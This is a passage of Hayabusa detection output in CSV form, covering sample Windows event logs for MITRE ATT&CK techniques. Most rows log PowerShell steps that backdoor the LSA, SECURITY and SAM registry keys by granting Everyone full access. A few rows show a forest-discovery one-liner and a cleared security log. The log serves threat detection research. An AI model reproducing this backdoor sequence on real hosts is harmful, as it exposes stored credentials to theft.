key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.494 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.494 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.494 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Creating the trustee WMI object with user 'Everyone'""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.494 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.503 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Applying Trustee to new Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.503 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Calling SetSecurityDescriptor on the key with the newly created Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.503 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Backdooring completed for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.503 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Data] Backdooring started for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.519 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Data] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.519 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.519 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Data] Creating the trustee WMI object with user 'Everyone'""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.519 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.535 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Data] Applying Trustee to new Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.540 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Data] Calling SetSecurityDescriptor on the key with the newly created Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.540 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Data] Backdooring completed for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.540 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Backdooring started for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.556 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.556 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.556 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Creating the trustee WMI object with user 'Everyone'""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.556 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.556 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Applying Trustee to new Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.571 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Calling SetSecurityDescriptor on the key with the newly created Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.571 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Backdooring completed for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.571 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SECURITY] Backdooring started for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.571 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SECURITY] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.571 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.587 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SECURITY] Creating the trustee WMI object with user 'Everyone'""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.587 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.587 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SECURITY] Applying Trustee to new Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.603 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SECURITY] Calling SetSecurityDescriptor on the key with the newly created Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.627 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SECURITY] Backdooring completed for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.627 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SAM\SAM\Domains\Account] Backdooring started for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.634 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SAM\SAM\Domains\Account] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.634 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.634 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SAM\SAM\Domains\Account] Creating the trustee WMI object with user 'Everyone'""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.634 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.650 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SAM\SAM\Domains\Account] Applying Trustee to new Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.650 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SAM\SAM\Domains\Account] Calling SetSecurityDescriptor on the key with the newly created Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.650 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SAM\SAM\Domains\Account] Backdooring completed for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.650 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03] Backdooring completed for system""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.666 +09:00,fs03vuln.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.666 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""PSObject""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.666 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Add-Member): ""Add-Member"" ParameterBinding(Add-Member): name=""MemberType""; value=""NoteProperty"" ParameterBinding(Add-Member): name=""Name""; value=""ComputerName"" ParameterBinding(Add-Member): name=""Value""; value=""FS03"" ParameterBinding(Add-Member): name=""InputObject""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.666 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Add-Member): ""Add-Member"" ParameterBinding(Add-Member): name=""MemberType""; value=""NoteProperty"" ParameterBinding(Add-Member): name=""Name""; value=""BackdoorTrustee"" ParameterBinding(Add-Member): name=""Value""; value=""S-1-1-0"" ParameterBinding(Add-Member): name=""InputObject""; value=""@{ComputerName=FS03}""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.666 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""@{ComputerName=FS03; BackdoorTrustee=S-1-1-0}""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-12 15:56:59.657 +09:00,fs03vuln.offsec.lan,4104,info,,PwSh Scriptblock Log,"foreach ($s in [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().Sites ){write-host ""[>] (site) $s"";foreach ($r in $s.Subnets){write-host "" └─> (subnet) $r"";foreach ($m in $s.Servers){write-host "" └─> (server) $m""}}}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1482-Domain Trust Discovery/ID800,4103,4104-Active Directory Forest PowerShell class.evtx" 2021-12-12 15:56:59.657 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Host): ""Write-Host"" ParameterBinding(Write-Host): name=""Object""; value=""[>] (site) OFFSEC-PREMISE""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1482-Domain Trust Discovery/ID800,4103,4104-Active Directory Forest PowerShell class.evtx" 2021-12-12 15:56:59.673 +09:00,fs03vuln.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1482-Domain Trust Discovery/ID800,4103,4104-Active Directory Forest PowerShell class.evtx" 2021-12-12 15:56:59.673 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Host): ""Write-Host"" ParameterBinding(Write-Host): name=""Object""; value=""[>] (site) LONDON""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1482-Domain Trust Discovery/ID800,4103,4104-Active Directory Forest PowerShell class.evtx" 2021-12-12 15:56:59.673 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1482-Domain Trust Discovery/ID800,4103,4104-Active Directory Forest PowerShell class.evtx" 2021-12-12 16:15:28.352 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: hack1,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.716 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: | IP Addr: 10.23.123.11 | LID: 0x8723c7c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx 2021-12-12 16:15:56.716 